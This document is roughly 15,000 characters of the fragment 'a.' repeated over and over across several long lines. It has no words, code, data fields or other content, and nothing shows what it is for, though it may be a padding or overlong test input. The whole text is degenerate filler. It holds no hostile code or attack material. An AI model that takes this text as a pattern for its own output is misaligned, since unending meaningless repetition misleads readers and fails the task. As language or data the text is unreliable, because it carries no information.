a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a
.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.a.